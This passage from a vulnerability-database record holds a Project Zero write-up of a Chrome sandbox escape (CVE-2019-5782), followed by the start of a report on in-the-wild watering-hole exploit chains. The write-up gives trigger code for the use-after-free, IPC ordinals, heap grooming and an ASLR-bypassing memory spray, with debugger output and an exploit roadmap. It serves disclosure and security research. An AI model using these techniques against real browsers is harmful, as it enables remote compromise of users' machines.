corrupted state will become fair game for garbage collection.\n\n## Talking to the Browser Process\n\nLooking through the Chrome source code, we can see that the Mojo bindings are added to the Javascript context in [RenderFrameImpl::DidCreateScriptContext](<https://cs.chromium.org/chromium/src/content/renderer/render_frame_impl.cc?rcl=8095e5d9d219ceff1aab5d00aaec59d629d50270&l=5453>), based on the member variable enabled_bindings_. So, to mimic the command line flag we can use our read/write to set that value to BINDINGS_POLICY_MOJO_WEB_UI, and force the creation of a new ScriptContext for the main frame and we should have access to the bindings!\n\n** \n**\n\nIt\u2019s slightly painful to get hold of the RenderFrameImpl for the current frame, but by following a chain of pointers from the global context object we can locate chrome_child.dll, and find the global `g_frame_map`, which is a map from blink::Frame pointers to RenderFrameImpl pointers. For the purposes of this exploit, we assume that there is only a single entry in this map; but it would be simple to extend this to find the right one. It\u2019s then trivial to set the correct flag and reload the page - see `enable_mojo.js` for the implementation.\n\n** \n**\n\nNote that Chrome randomizes the IPC ordinals at build time, so in addition to enabling the bindings, we also need to find the correct ordinals for every IPC method that we want to call. This can be resolved in a few minutes of time in a disassembler of your choice; given that the renderer needs to be able to call these IPC methods, this is just a slightly annoying obfuscation that we could engineer around if we were trying to support more Chrome builds, but for the one version we\u2019re supporting here it\u2019s sufficient to modify the handful of javascript bindings we need:\n\n** \n**\n\nvar kBlob_GetInternalUUID_Name = 0x2538AE26;\n\n** \n**\n\nvar kBlobRegistry_Register_Name = 0x2158E98A;\n\nvar kBlobRegistry_RegisterFromStream_Name = 0x719E4F82;\n\n** \n**\n\nvar kFileSystemManager_Open_Name = 0x305E02BE;\n\nvar kFileSystemManager_CreateWriter_Name = 0x63B8D2A6;\n\n** \n**\n\nvar kFileWriter_Write_Name = 0x64D4FC1C;\n\n## The bug\n\nSo we\u2019ve got access to the IPC interfaces from Javascript - what now?\n\n** \n**\n\nThe bug that we\u2019re looking at is an issue in the implementation of the FileWriter interface of the [FileSystem API](<https://www.html5rocks.com/en/tutorials/file/filesystem/>). This is the interface description for the FileWriter interface, which is an IPC endpoint vended by the privileged browser process to the unprivileged renderer process to allow the renderer to perform brokered file writes to special sandboxed filesystems:\n\n** \n**\n\n// Interface provided to the renderer to let a renderer write data to a file.\n\ninterface FileWriter {\n\n// Write data from |blob| to the given |position| in the file being written\n\n// to. Returns whether the operation succeeded and if so how many bytes were\n\n// written.\n\n// TODO(mek): This might need some way of reporting progress events back to\n\n// the renderer.\n\nWrite(uint64 position, Blob blob) => (mojo_base.mojom.FileError result,\n\nuint64 bytes_written);\n\n** \n**\n\n// Write data from |stream| to the given |position| in the file being written\n\n// to. Returns whether the operation succeeded and if so how many bytes were\n\n// written.\n\n// TODO(mek): This might need some way of reporting progress events back to\n\n// the renderer.\n\nWriteStream(uint64 position, handle<data_pipe_consumer> stream) =>\n\n(mojo_base.mojom.FileError result, uint64 bytes_written);\n\n** \n**\n\n// Changes the length of the file to be |length|. If |length| is larger than\n\n// the current size of the file, the file will be extended, and the extended\n\n// part is filled with null bytes.\n\nTruncate(uint64 length) => (mojo_base.mojom.FileError result);\n\n};\n\n** \n**\n\nThe vulnerability was in the implementation of the first method, Write. However, before we can properly understand the bug, we need to understand the lifetime of the FileWriter objects. The renderer can request a FileWriter instance by using one of the methods in the FileSystemManager interface:\n\n** \n**\n\n// Interface provided by the browser to the renderer to carry out filesystem\n\n// operations. All [Sync] methods should only be called synchronously on worker\n\n// threads (and asynchronously otherwise).\n\ninterface FileSystemManager {\n\n// ...\n\n** \n**\n\n// Creates a writer for the given file at |file_path|.\n\nCreateWriter(url.mojom.Url file_path) =>\n\n(mojo_base.mojom.FileError result,\n\nblink.mojom.FileWriter? writer);\n\n** \n**\n\n// ...\n\n};\n\n** \n**\n\nThe implementation of that function can be found [here](<https://chromium.googlesource.com/chromium/src/+/43be2d668342e8b1dd83cb1a2b9ebfa86474ba45/content/browser/fileapi/file_system_manager_impl.cc#573>):\n\n** \n**\n\nvoid FileSystemManagerImpl::CreateWriter(const GURL& file_path,\n\nCreateWriterCallback callback) {\n\nDCHECK_CURRENTLY_ON(BrowserThread::IO);\n\n** \n**\n\nFileSystemURL url(context_->CrackURL(file_path));\n\nbase::Optional<base::File::Error> opt_error = ValidateFileSystemURL(url);\n\nif (opt_error) {\n\nstd::move(callback).Run(opt_error.value(), nullptr);\n\nreturn;\n\n}\n\nif (!security_policy_->CanWriteFileSystemFile(process_id_, url)) {\n\nstd::move(callback).Run(base::File::FILE_ERROR_SECURITY, nullptr);\n\nreturn;\n\n}\n\n** \n**\n\nblink::mojom::FileWriterPtr writer;\n\nmojo::MakeStrongBinding(std::make_unique<storage::FileWriterImpl>(\n\nurl, context_->CreateFileSystemOperationRunner(),\n\nblob_storage_context_->context()->AsWeakPtr()),\n\nMakeRequest(&writer));\n\nstd::move(callback).Run(base::File::FILE_OK, std::move(writer));\n\n}\n\n** \n**\n\nThe implication here is that if everything goes correctly, we\u2019re returning a std::unique_ptr<storage::FileWriterImpl> bound to a mojo::StrongBinding. A strong binding means that the lifetime of the object is bound to the lifetime of the Mojo interface pointer - this means that the other side of the connection can control the lifetime of the object - and at any point where the code in storage::FileWriterImpl yields control of the [sequence](<https://chromium.googlesource.com/chromium/src/+/lkgr/docs/threading_and_tasks.md#posting-a-sequenced-task>) associated with that binding, the connection could be closed and the instance could be free\u2019d.\n\n** \n**\n\nThis gives us a handle to the blink::mojom::FileWriter Mojo interface described [here](<https://cs.chromium.org/chromium/src/third_party/blink/public/mojom/filesystem/file_writer.mojom?type=cs&q=FileWriter+f:mojom$&sq=package:chromium&g=0&l=11>); the function of interest to us is the Write method, which has a handle to a blink::mojom::Blob as one of it\u2019s parameters. We\u2019ll look at this Blob interface again shortly.\n\n** \n**\n\nWith this in mind, it\u2019s time to look at the vulnerable [function](<https://chromium.googlesource.com/chromium/src/+/975798170a17a651cb399bdc030b9991cf2c7b3a/storage/browser/fileapi/file_writer_impl.cc#26>).\n\n** \n**\n\nvoid FileWriterImpl::Write(uint64_t position,\n\nblink::mojom::BlobPtr blob,\n\nWriteCallback callback) {\n\nblob_context_->GetBlobDataFromBlobPtr(\n\nstd::move(blob),\n\nbase::BindOnce(&FileWriterImpl::DoWrite, base::Unretained(this),\n\nstd::move(callback), position));\n\n}\n\n** \n**\n\nNow, it\u2019s not immediately obvious that there\u2019s an issue here; but in the Chrome codebase instances of base::Unretained which aren\u2019t immediately obviously correct are often worth further investigation (this creates an unchecked, unowned reference - see Chrome [documentation](<https://www.chromium.org/developers/coding-style/important-abstractions-and-data-structures>)). So; this code can only be safe if GetBlobDataFromBlobPtr always synchronously calls the callback, or if destroying this will ensure that the callback is never called. Since blob_context_ isn\u2019t owned by this, we need to look at the [implementation](<https://chromium.googlesource.com/chromium/src/+/4d526b4f33f813b0ccd3d87a068f26b702d6aff8/storage/browser/blob/blob_storage_context.cc#80>) of GetBlobDataFromBlobPtr, and the way in which it uses callback:\n\n** \n**\n\nvoid BlobStorageContext::GetBlobDataFromBlobPtr(\n\nblink::mojom::BlobPtr blob,\n\nbase::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback) {\n\nDCHECK(blob);\n\nblink::mojom::Blob* raw_blob = blob.get();\n\nraw_blob->GetInternalUUID(mojo::WrapCallbackWithDefaultInvokeIfNotRun(\n\nbase::BindOnce(\n\n[](blink::mojom::BlobPtr, base::WeakPtr<BlobStorageContext> context,\n\nbase::OnceCallback<void(std::unique_ptr<BlobDataHandle>)> callback,\n\nconst std::string& uuid) {\n\nif (!context || uuid.empty()) {\n\nstd::move(callback).Run(nullptr);\n\nreturn;\n\n}\n\nstd::move(callback).Run(context->GetBlobDataFromUUID(uuid));\n\n},\n\nstd::move(blob), AsWeakPtr(), std::move(callback)),\n\n\"\"));\n\n}\n\n** \n**\n\nThe code above is calling an asynchronous Mojo IPC method GetInternalUUID on the blob parameter that\u2019s passed to it, and then (in a callback) when that method returns it\u2019s using the returned UUID to find the associated blob data (GetBlobDataFromUUID), and calling the callback parameter with this data as an argument.\n\n** \n**\n\nWe can see that the callback is passed into the return callback for an asynchronous Mojo function exposed by the Blob [interface](<https://cs.chromium.org/chromium/src/third_party/blink/public/mojom/blob/blob.mojom>):\n\n** \n**\n\n// This interface provides access to a blob in the blob system.\n\ninterface Blob {\n\n// Creates a copy of this Blob reference.\n\nClone(Blob& blob);\n\n** \n**\n\n// Creates a reference to this Blob as a DataPipeGetter.\n\nAsDataPipeGetter(network.mojom.DataPipeGetter& data_pipe_getter);\n\n** \n**\n\n// Causes the entire contents of this blob to be written into the given data\n\n// pipe. An optional BlobReaderClient will be informed of the result of the\n\n// read operation.\n\nReadAll(handle<data_pipe_producer> pipe, BlobReaderClient? client);\n\n** \n**\n\n// Causes a subrange of the contents of this blob to be written into the\n\n// given data pipe. If |length| is -1 (uint64_t max), the range's end is\n\n// unbounded so the entire contents are read starting at |offset|. An\n\n// optional BlobReaderClient will be informed of the result of the read\n\n// operation.\n\nReadRange(uint64 offset, uint64 length, handle<data_pipe_producer> pipe,\n\nBlobReaderClient? client);\n\n** \n**\n\n// Reads the side-data (if any) associated with this blob. This is the same\n\n// data that would be passed to OnReceivedCachedMetadata if you were reading\n\n// this blob through a blob URL.\n\nReadSideData() => (array<uint8>? data);\n\n** \n**\n\n// This method is an implementation detail of the blob system. You should not\n\n// ever need to call it directly.\n\n// This returns the internal UUID of the blob, used by the blob system to\n\n// identify the blob.\n\nGetInternalUUID() => (string uuid);\n\n};\n\n** \n**\n\nThis means that we can provide an implementation of this Blob interface hosted in the renderer process; pass an instance of that implementation into the FileWriter interface\u2019s Write method, and we\u2019ll get a callback from the browser process to the renderer process during the execution of GetBlobDataFromBlobPtr, during which we can destroy the FileWriter object. The use of base::Unretained here would be dangerous regardless of this callback, but having it scheduled in this way makes it much cleaner to exploit.\n\n## Step 1: A Trigger\n\nFirst we need to actually reach the bug - this is a minimal trigger from Javascript using the MojoJS bindings we enabled earlier. A complete sample is attached to the bugtracker entry - the file is \u2018trigger.js\u2019\n\n** \n**\n\nasync function trigger() {\n\n// we need to know the UUID for a valid Blob\n\nlet blob_registry_ptr = new blink.mojom.BlobRegistryPtr();\n\nMojo.bindInterface(blink.mojom.BlobRegistry.name,\n\nmojo.makeRequest(blob_registry_ptr).handle, \"process\");\n\n** \n**\n\nlet bytes_provider = new BytesProviderImpl();\n\nlet bytes_provider_ptr = new blink.mojom.BytesProviderPtr();\n\nbytes_provider.binding.bind(mojo.makeRequest(bytes_provider_ptr));\n\n** \n**\n\nlet blob_ptr = new blink.mojom.BlobPtr();\n\nlet blob_req = mojo.makeRequest(blob_ptr);\n\n** \n**\n\nlet data_element = new blink.mojom.DataElement();\n\ndata_element.bytes = new blink.mojom.DataElementBytes();\n\ndata_element.bytes.length = 1;\n\ndata_element.bytes.embeddedData = [0];\n\ndata_element.bytes.data = bytes_provider_ptr;\n\n** \n**\n\nawait blob_registry_ptr.register(blob_req, 'aaaa', \"text/html\", \"\", [data_element]);\n\n** \n**\n\n// now we have a valid UUID, we can trigger the bug\n\nlet file_system_manager_ptr = new blink.mojom.FileSystemManagerPtr();\n\nMojo.bindInterface(blink.mojom.FileSystemManager.name,\n\nmojo.makeRequest(file_system_manager_ptr).handle, \"process\");\n\n** \n**\n\nlet host_url = new url.mojom.Url();\n\nhost_url.url = window.location.href;\n\n** \n**\n\nlet open_result = await file_system_manager_ptr.open(host_url, 0);\n\n** \n**\n\nlet file_url = new url.mojom.Url();\n\nfile_url.url = open_result.rootUrl.url + '/aaaa';\n\n** \n**\n\nlet file_writer = (await file_system_manager_ptr.createWriter(file_url)).writer;\n\n** \n**\n\nfunction BlobImpl() {\n\nthis.binding = new mojo.Binding(blink.mojom.Blob, this);\n\n}\n\n** \n**\n\nBlobImpl.prototype = {\n\ngetInternalUUID: async (arg0) => {\n\n// here we free the FileWriterImpl in the callback\n\ncreate_writer_result.writer.ptr.reset();\n\n** \n**\n\nreturn {'uuid': 'aaaa'};\n\n}\n\n};\n\n** \n**\n\nlet blob_impl = new BlobImpl();\n\nlet blob_impl_ptr = new blink.mojom.BlobPtr();\n\nblob_impl.binding.bind(mojo.makeRequest(blob_impl_ptr));\n\n** \n**\n\nfile_writer.write(0, blob_impl_ptr);\n\n}\n\n## Step 2: Replacement\n\nAlthough it\u2019s likely not to be of much use in the end, I usually like to start the process of exploiting a use-after-free by replacing the object with completely attacker controlled data - although without an ASLR bypass or an information leak, it\u2019s unlikely we can do anything useful with this primitive, but it\u2019s often useful to get an understanding of the allocation patterns around the object involved, and it gives a clear crash that\u2019s useful to demonstrate the likely exploitability of the issue.\n\n** \n**\n\nOn the Windows build that we\u2019re looking at, the size of the FileWriterImpl is 0x140 bytes. I originally looked at using the Javascript Blob API directly to create allocations, but this causes a number of additional temporary allocations of the same size, which significantly reduces reliability. A better way to cause allocations of a controlled size with controlled data in the browser process is to register new Blobs using the BlobRegistry registerFromStream method - this will perform all of the secondary allocations during the initial call to registerFromStream, and we can then trigger a single allocation of the desired size and contents later by writing data into the DataPipeProducerHandle.\n\n** \n**\n\nWe can test this (see \u2018trigger_replace.js\u2019), and indeed it does reliably replace the free\u2019d object with a buffer containing completely controlled bytes, and crashes in the way we\u2019d expect:\n\n** \n**\n\n(1594.226c): Access violation - code c0000005 (first chance)\n\nFirst chance exceptions are reported before any exception handling.\n\nThis exception may be expected and handled.\n\nchrome!storage::FileSystemOperationRunner::GetMetadata+0x33:\n\n00007ffc`362a1a99 488b4908 mov rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????\n\n0:002> r\n\nrax=0000ce61f98b376e rbx=0000021b30eb4bd0 rcx=2323232323232323\n\nrdx=0000021b30eb4bd0 rsi=0000005ae4ffe3e0 rdi=2323232323232323\n\nrip=00007ffc362a1a99 rsp=0000005ae4ffe2f0 rbp=0000005ae4ffe468\n\nr8=0000005ae4ffe35c r9=0000005ae4ffe3e0 r10=0000021b30badbf0\n\nr11=0000000000000000 r12=0000000000000000 r13=0000005ae4ffe470\n\nr14=0000000000000001 r15=0000005ae4ffe3e8\n\niopl=0 nv up ei pl nz na pe nc\n\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202\n\nchrome!storage::FileSystemOperationRunner::GetMetadata+0x33:\n\n00007ffc`362a1a99 488b4908 mov rcx,qword ptr [rcx+8] ds:23232323`2323232b=????????????????\n\n0:002> k\n\n# Child-SP RetAddr Call Site\n\n00 0000005a`e4ffe2f0 00007ffc`362a74ed chrome!storage::FileSystemOperationRunner::GetMetadata+0x33 01 0000005a`e4ffe3a0 00007ffc`362a7aef chrome!storage::FileWriterImpl::DoWrite+0xed\n\n\u2026\n\n## Step 3: Information Leak\n\nIt\u2019s not much use controlling the data in the free\u2019d object, when we need to be able to put valid pointers in there - so at this point we need to consider how the free\u2019d object is used, and what options we have for replacing the free\u2019d object with a different type of object, essentially turning the use-after-free into a type-confusion in a way that will achieve something useful to us.\n\n** \n**\n\nLooking through objects of the same size in windbg however did not provide any immediate answers - and since most of the methods being called from DoWrite are non-virtual, we actually need quite a large amount of structure to be correct in the replacing object.\n\n** \n**\n\nvoid FileWriterImpl::DoWrite(WriteCallback callback,\n\nuint64_t position,\n\nstd::unique_ptr<BlobDataHandle> blob) {\n\nif (!blob) {\n\nstd::move(callback).Run(base::File::FILE_ERROR_FAILED, 0);\n\nreturn;\n\n}\n\n// FileSystemOperationRunner assumes that positions passed to Write are always\n\n// valid, and will NOTREACHED() if that is not the case, so first check the\n\n// size of the file to make sure the position passed in from the renderer is\n\n// in fact valid.\n\n// Of course the file could still change between checking its size and the\n\n// write operation being started, but this is at least a lot better than the\n\n// old implementation where the renderer only checks against how big it thinks\n\n// the file currently is.\n\noperation_runner_->GetMetadata(\n\nurl_, FileSystemOperation::GET_METADATA_FIELD_SIZE,\n\nbase::BindRepeating(&FileWriterImpl::DoWriteWithFileInfo,\n\nbase::Unretained(this),\n\nbase::AdaptCallbackForRepeating(std::move(callback)),\n\nposition, base::Passed(std::move(blob))));\n\n}\n\n** \n**\n\nSo; we\u2019re going to make a non-virtual call to [FileSystemOperationRunner::GetMetadata](<https://chromium.googlesource.com/chromium/src/+/d755a8cf625f40b2b2a4c7e96adb8337b135aa68/storage/browser/fileapi/file_system_operation_runner.cc#174>) with a this pointer taken from inside the free\u2019d object:\n\n** \n**\n\nOperationID FileSystemOperationRunner::GetMetadata(\n\nconst FileSystemURL& url,\n\nint fields,\n\nGetMetadataCallback callback) {\n\nbase::File::Error error = base::File::FILE_OK;\n\nstd::unique_ptr<FileSystemOperation> operation = base::WrapUnique(\n\nfile_system_context_->CreateFileSystemOperation(url, &error));\n\n...\n\n}\n\n** \n**\n\nAnd that will then make a non-virtual call to [FileSystemContext::CreateFileSystemOperation](<https://chromium.googlesource.com/chromium/src/+/1606ab8b04ea62cdbd4243414936168971d6a677/storage/browser/fileapi/file_system_context.cc#524>) with a this pointer taken from inside whatever the previous this pointer pointed to\u2026\n\n** \n**\n\nFileSystemOperation* FileSystemContext::CreateFileSystemOperation(\n\nconst FileSystemURL& url, base::File::Error* error_code) {\n\n...\n\n** \n**\n\nFileSystemBackend* backend = GetFileSystemBackend(url.type());\n\nif (!backend) {\n\nif (error_code)\n\n*error_code = base::File::FILE_ERROR_FAILED;\n\nreturn nullptr;\n\n}\n\n** \n**\n\n...\n\n}\n\n** \n**\n\nWhich will then finally expect to be able to lookup a FileSystemBackend pointer from an std::map contained inside it!\n\n** \n**\n\nFileSystemBackend* FileSystemContext::GetFileSystemBackend(\n\nFileSystemType type) const {\n\nauto found = backend_map_.find(type);\n\nif (found != backend_map_.end())\n\nreturn found->second;\n\nNOTREACHED() << \"Unknown filesystem type: \" << type;\n\nreturn nullptr;\n\n}\n\n** \n**\n\nThis is quite a comprehensive set of constraints. (If we can meet them all, the call to backend->CreateFileSystemOperation is finally a virtual call which would be where we\u2019d hope to achieve a useful side-effect).\n\n** \n**\n\nAfter looking through the types of the same size (0x140 bytes), nothing jumped out as being both easy to allocate in a controlled way, and also overlapping in a compatible way - so we can instead consider an alternative approach. On Windows, the freeing of a heap block doesn\u2019t (immediately) corrupt the data it contains - so if we can groom to make sure that the FileWriterImpl allocation isn\u2019t reused, we can instead replace the FileSystemOperationRunner object directly, and access it through the stale pointer. This reduces one dereference from our constraints, and means we are looking in a different size class (0x80 bytes)\u2026 There are roughly 1000 object types of this size, and again nothing is obviously useful, so maybe we can consider alternative solutions...\n\n## Step 4: Information Leak (round #2)\n\nTired of staring at structure layouts in the debugger, time to consider any alternative we could come up with. The ASLR implementation on Windows means that if the same library is loaded in multiple processes, it will be at the same base address; so any library loaded in the renderer will be loaded at a known address in the browser process.\n\n** \n**\n\nThere are a few objects we could replace the FileSystemOperationRunner with that would line up the FileSystemContext pointer to controlled string data; we could use this to fake the first/begin node of the backend_map_ with a pointer into the data section of one of the modules that we can locate, and there line things up correctly so that we could lookup the first entry. This only required an even smaller set of constraints:\n\n** \n**\n\nptr = getPtr(address)\n\n** \n**\n\ngetUint8(ptr + 0x19) == 0\n\ngetUint32(ptr + 0x20) == 0\n\nobj = getPtr(ptr + 0x28)\n\n** \n**\n\nvtable = getPtr(obj)\n\n** \n**\n\nfunction = getPtr(vtable + 0x38)\n\n** \n**\n\nThe set of addresses which meet these constraints, unfortunately, does not really produce any useful primitives.\n\n## Step 5: ASLR Bypass\n\nHaving almost completely given up, we remembered one of the quirks related to [issue 1642](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1642>), a bug in the Mojo core code. Specifically; when the receiving end of a Mojo connection receives a [DataPipe*Dispatcher](<https://chromium.googlesource.com/chromium/src/+/66e24a8793615bd9d5c238b1745b093090e1f72d/mojo/core/data_pipe_consumer_dispatcher.cc#361>) object, it will immediately map an associated shared memory section (the mapping occurs inside the call to InitializeNoLock).\n\n** \n**\n\nSince there\u2019s no memory or virtual address space limit in the browser process, this suggests that in fact, we may be able to completely bypass ASLR without an information leak if we can simply spray the virtual address space of the browser with shared memory mappings. Note - the renderer limits will still be applied, so we need to find a way to do this without exceeding the renderer limits. This should be fairly trivial from native code running in the renderer; we can simply duplicate handles to the same shared memory page, and repeatedly send them - but it would be nice to stay in Javascript.\n\n** \n**\n\nLooking into the IDL for the MojoHandle interface in MojoJS bindings, we can note that while we can\u2019t clone DataPipe handles, we can clone SharedBuffer handles. \n\n** \n**\n\ninterface MojoHandle {\n\n...\n\n// TODO(alokp): Create MojoDataPipeProducerHandle and MojoDataPipeConsumerHandle,\n\n// subclasses of MojoHandle and move the following member functions.\n\nMojoWriteDataResult writeData(BufferSource buffer, optional MojoWriteDataOptions options);\n\nMojoReadDataResult queryData();\n\nMojoReadDataResult discardData(unsigned long numBytes, optional MojoDiscardDataOptions options);\n\nMojoReadDataResult readData(BufferSource buffer, optional MojoReadDataOptions options);\n\n** \n**\n\n// TODO(alokp): Create MojoSharedBufferHandle, a subclass of MojoHandle\n\n// and move the following member functions.\n\nMojoMapBufferResult mapBuffer(unsigned long offset, unsigned long numBytes);\n\nMojoCreateSharedBufferResult duplicateBufferHandle(optional MojoDuplicateBufferHandleOptions options);\n\n};\n\n** \n**\n\nUnfortunately, SharedBuffers are used much less frequently in the browser process interfaces, and they\u2019re not automatically mapped when they are deserialized, so they\u2019re less useful for our purposes. However, since both SharedBuffers and DataPipes are backed by the same operating-system level primitives, we can still use this to our advantage; by creating an equal number of DataPipes with small shared memory mappings, and clones of a single, large SharedBuffer, we can then use our arbitrary read-write to swap the backing buffers!\n\n[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGINNa4nXPogImlula6gigQKMHTIoOV5_8LYW0oI1VoOYDkC5N81NhWpe3oUBZ3iDTjWFbZdzs5YaR-7uY6QprDITF2eMsYgjwR3kDuXbW434rGorpoLwqnx4-9syDXlO3b5T5umb1EuSjQycICzI7Yz_H0evwdx-GBDxm8S7Vk1jq8G8eePgLDXSi/s600/image1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGINNa4nXPogImlula6gigQKMHTIoOV5_8LYW0oI1VoOYDkC5N81NhWpe3oUBZ3iDTjWFbZdzs5YaR-7uY6QprDITF2eMsYgjwR3kDuXbW434rGorpoLwqnx4-9syDXlO3b5T5umb1EuSjQycICzI7Yz_H0evwdx-GBDxm8S7Vk1jq8G8eePgLDXSi/s1267/image1.png>)\n\nAs we can see in the VMMap screenshot above - this is both effective and quick! The first test performed a 16-terabyte spray, which got a bit laggy, but in the real-world about 3.5-terabytes appears sufficient to get a reliable, predictable address. Finally, a chance to cite SkyLined\u2019s exploit for [MS04-040](<https://www.exploit-db.com/exploits/612>) in a modern 64-bit Chrome exploit!\n\n** \n**\n\nA little bit of fiddling later:\n\n** \n**\n\nrax=00000404040401e8 rbx=000001fdba193480 rcx=00000404040401e8\n\nrdx=000001fdba193480 rsi=00000002f39fe97c rdi=00000404040400b0\n\nrip=00007ffd87270258 rsp=00000002f39fe8c0 rbp=00000002f39fea88\n\nr8=00000404040400b0 r9=00000002f39fe8e4 r10=00000404040401f0\n\nr11=0000000000000000 r12=0000000000000000 r13=00000002f39fea90\n\nr14=0000000000000001 r15=00000002f39fea08\n\niopl=0 nv up ei pl nz na po nc\n\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\n\nchrome!storage::FileSystemContext::CreateFileSystemOperation+0x4c:\n\n00007ffd`87270258 41ff5238 call qword ptr [r10+38h] ds:00000404`04040228=4141414141414141\n\n## Roadmap\n\nOk, at this point we should have all the heavy machinery that we need - the rest is a matter of engineering. For the detail-oriented; you can find a full, working exploit in the bugtracker, and you should be able to identify the code handling all of the following stages of the exploit:\n\n** \n**\n\n 1. Arbitrary read-write in the renderer\n\n 1. Enable MojoJS bindings\n\n 2. Launch sandbox escape\n\n 2. Sandbox escape\n\n 1. Arbitrary read-write in the renderer (again\u2026)\n\n 2. Locate necessary libraries for pivots and ROP chain in the renderer address space\n\n 3. Build a page of data that we\u2019re going to spray in the browser address space containing fake FileSystemOperationRunner, FileSystemContext, FileSystemBackend objects\n\n 4. Trigger the bug\n\n 5. Replace the free\u2019d FileWriterImpl with a fake object that uses the address that we\u2019ll target with our spray as the FileSystemOperationRunner pointer\n\n 6. Spray ~4tb of copies of the page we built in 2c into the browser process address space\n\n 7. Return from the renderer to FileWriterImpl::DoWrite in the browser process, pivoting into our ROP chain and payload\n\n 8. Pop calc\n\n 9. Clean things up so that the browser can continue running\n\n## Conclusions\n\nIt\u2019s interesting to have another case where we\u2019ve been able to use weaknesses in ASLR implementations to achieve a working exploit without needing an information leak.\n\n** \n**\n\nThere were two key ASLR weaknesses that enabled reliable exploitation of this bug:\n\n * No inter-process randomisation on Windows (which is also a limitation on MacOS/iOS) which enabled locating valid code addresses in the target process without an information-leak.\n\n * No limitations on address-space usage in the Chrome Browser Process, which enabled predicting valid data addresses in the heap-spray.\n\n \n\n\nWithout both of these primitives, it would be more difficult to exploit this vulnerability, and would likely have pushed past available motivation (better to keep looking for a better vulnerability, or an additional information leak since the use-after-free wasn\u2019t readily usable as an information leak).\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-04-11T00:00:00", "type": "googleprojectzero", "title": "\nVirtually Unlimited Memory: Escaping the Chrome Sandbox\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5782"], "modified": "2019-04-11T00:00:00", "id": "GOOGLEPROJECTZERO:0519E4321416167A439C0603E926B98E", "href": "https://googleprojectzero.blogspot.com/2019/04/virtually-unlimited-memory-escaping.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-25T01:57:26", "description": "This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.\n\nAt Project Zero we often refer to our goal simply as \u201cmake 0-day hard\u201d. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn\u2019t stray too far from the current state of the art. One of our efforts in this regard is [the tracking](<https://googleprojectzero.blogspot.com/p/0day.html>) of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be [a gap in the security community\u2019s ability to detect 0-day exploits](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>).\n\nTherefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor. \n\nWe discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.\n\n[![Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUXJvRN5FDx6DnYO4iv4qizO1yFesi5Cn1Z8YdxLn3j2x7okPs1tH_y5wteboBbNxIDV3QrAtBswDRaOQQjoxdZ7xECvYxQzKRI8vH4Cnw-Ijq4E5DZPCrYl7Mf7gR3DJRV_dz6mIJONmrSBDClUTkq5EhneCrRmp9P_emSuSVD83khlO_XneCXb4j/s1871/itw%20diagram.png>)\n\nFrom the exploit servers, we have extracted:\n\n * Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.\n * Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.\n * A \u201cprivilege escalation kit\u201d composed of publicly known n-day exploits for older versions of Android.\n\nThe four 0-days discovered in these chains have been fixed by the appropriate vendors:\n\n * [CVE-2020-6418](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-6418.html>) \\- Chrome Vulnerability in TurboFan (fixed February 2020)\n * [CVE-2020-0938](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-0938.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * [CVE-2020-1020](<https://googleprojectzero.blogspot.com/p/rca-cve-2020-1020.html>) \\- Font Vulnerability on Windows (fixed April 2020)\n * 